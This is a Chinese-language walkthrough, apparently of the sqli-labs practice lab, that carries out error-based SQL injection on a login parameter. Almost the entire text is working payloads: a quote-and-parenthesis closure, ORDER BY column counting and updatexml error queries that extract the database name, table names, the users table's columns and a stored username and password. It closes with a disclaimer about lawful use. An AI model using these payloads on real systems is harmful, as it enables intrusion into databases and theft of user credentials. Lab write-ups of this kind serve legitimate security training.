1.判断注入类型
1 and 1=1
1 and 1=2
字符型
2.判断闭合点
1'
闭合点为 ‘)
3.猜字段
1') order by 3#
1') order by 2#
4.确定回显位
1') union select 1,2#
没有回显位--报错注入/布尔盲注
5.获取数据库名称
1') union select (updatexml(1,concat(0x7e,(select database()),0x7e),1))#
数据库名称为:security
6.获取所有表名
第一张表
1') union select (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1))#
第二张表
1') union select (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 1,1),0x7e),1))#
第三张表
1') union select (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 2,1),0x7e),1))#
第四张表
1') union select (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1))#
7.获取所有字段名
第一个字段
1') union select (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x7e),1))#
第一个字段名:id
第二个字段
1') union select (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),0x7e),1))#
第二个字段名:username
第三个字段
1') union select (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),0x7e),1))#
第三个字段名:password
8.获取数据
username
1') union select (updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1))#
第一个数据的username:Dumb
password
1') union select (updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1))#
第一个数据的password:Dumb
总结:
免责声明:工具本身并无好坏,希望大家以遵守《网络安全法》相关法律为前提来使用该工具,支持研究学习,切勿用于非法犯罪活动,对于恶意使用该工具造成的损失,和本人及开发者无关。